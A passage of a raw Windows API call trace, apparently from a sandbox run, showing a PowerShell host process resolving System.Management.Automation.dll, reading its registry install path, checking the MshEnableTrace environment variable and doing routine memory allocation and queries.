	[0847.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.681] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16db38 | out: phkResult=0x16db38*=0x37c) returned 0x0
	[0847.681] RegQueryValueExW (in: hKey=0x37c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dabc, lpData=0x0, lpcbData=0x16dab8*=0x0 | out: lpType=0x16dabc*=0x1, lpData=0x0, lpcbData=0x16dab8*=0x56) returned 0x0
	[0847.681] CoTaskMemAlloc (cb=0x5a) returned 0x1b73e570
	[0847.681] RegQueryValueExW (in: hKey=0x37c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16da8c, lpData=0x1b73e570, lpcbData=0x16da88*=0x56 | out: lpType=0x16da8c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16da88*=0x56) returned 0x0
	[0847.681] CoTaskMemFree (pv=0x1b73e570) 
	[0847.682] RegCloseKey (hKey=0x37c) returned 0x0
	[0847.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.690] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0847.690] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0847.690] CoTaskMemFree (pv=0x2b4b30) 
	[0847.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0848.631] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0848.631] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.631] CoTaskMemFree (pv=0x2b4b30) 
	[0848.637] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0848.637] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.637] CoTaskMemFree (pv=0x2b4b30) 
	[0848.637] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0848.637] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.638] CoTaskMemFree (pv=0x2b4b30) 
	[0848.638] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0848.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.638] CoTaskMemFree (pv=0x2b4b30) 
	[0848.639] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0848.639] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.639] CoTaskMemFree (pv=0x2b4b30) 
	[0848.641] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0848.641] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.641] CoTaskMemFree (pv=0x2b4b30) 
	[0848.641] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0848.641] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.642] CoTaskMemFree (pv=0x2b4b30) 
	[0848.669] VirtualQuery (in: lpAddress=0x16bb90, lpBuffer=0x16ca50, dwLength=0x30 | out: lpBuffer=0x16ca50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0851.532] VirtualQuery (in: lpAddress=0x16bb90, lpBuffer=0x16ca50, dwLength=0x30 | out: lpBuffer=0x16ca50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0851.540] CoTaskMemAlloc (cb=0x104) returned 0x2b4b30
	[0851.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0851.540] CoTaskMemFree (pv=0x2b4b30) 
	[0854.728] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2b4c40
	[0854.730] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2b4d50
	[0862.148] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0862.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0862.148] CoTaskMemFree (pv=0x2b4e60) 
	[0862.150] CoTaskMemAlloc (cb=0x104) returned 0x2b4e60
	[0862.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4e60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0862.151] CoTaskMemFree (pv=0x2b4e60) 
	[0863.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
